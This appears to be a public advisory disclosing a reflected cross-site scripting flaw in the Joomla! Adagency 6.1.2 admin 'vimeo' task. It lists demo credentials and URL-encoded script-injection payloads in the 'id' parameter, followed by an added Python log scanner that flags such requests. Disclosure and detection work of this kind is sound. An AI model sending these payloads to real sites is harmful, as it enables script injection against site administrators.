Joomla Adagency 6.1.2 Cross Site Scripting
# Exploit Title: Joomla! Adagency V 6.1.2 Cross Site Scripting
# Date: 24.07.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://adagency.ijoomla.com/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/08/joomla-adagency-v-612-cross-site.html
PoC:
https://ijoomlademo.com
user demo
password demo
Example with XSS code injection:
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E
Example with XSS/HTML code injection:
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cbody%20background=%22https://i.gifer.com/IrM.gif%22%3E%3Cscript%3Ealert(%22Cross%20site%20scripting%20and%20html%20code%20injection%22)%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/s5_XkjC2fGY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E
Video PoC:
https://www.youtube.com/watch?v=APDqKv88znw
Picture:
https://imgur.com/a/w2attqc
XSS code on Pastebin:
https://pastebin.com/bRSnjZtL
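A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web access logs for com_adagency `task=vimeo` requests whose `id` parameter is not purely numeric, including double-encoded values. The log lines are constructed, and the digits-only rule for `id` is an assumption about what a legitimate video id looks like.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Jul/2020:10:00:01 +0000] "GET /administrator/index.php'
    '?option=com_adagency&controller=adagencyAbout&task=vimeo&id=76979871 HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Jul/2020:10:00:07 +0000] "GET /administrator/index.php'
    '?option=com_adagency&controller=adagencyAbout&task=vimeo'
    '&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 734',
    '198.51.100.7 - - [24/Jul/2020:10:02:30 +0000] "GET /administrator/index.php'
    '?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%2522%253E HTTP/1.1" 200 601',
    '203.0.113.5 - - [24/Jul/2020:10:03:00 +0000] "GET /administrator/index.php'
    '?option=com_content&view=articles&id=%3Cb%3E HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"\A\d{1,12}\Z")  # assumption: legitimate ids are digits only


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_vimeo_requests(lines):
    """Return (client_ip, decoded_id) for com_adagency vimeo requests with a non-numeric id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs performs the first round of percent-decoding.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if query.get("option") != ["com_adagency"] or query.get("task") != ["vimeo"]:
            continue
        for raw in query.get("id", []):
            value = fully_decode(raw)
            if not NUMERIC_ID.match(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_vimeo_requests(SAMPLE_LOG):
        print(f"{ip}\tid={value!r}")
```

The same digits-only rule can be enforced server-side on `id` before the value is written into the page, which removes the injection point rather than only detecting its use.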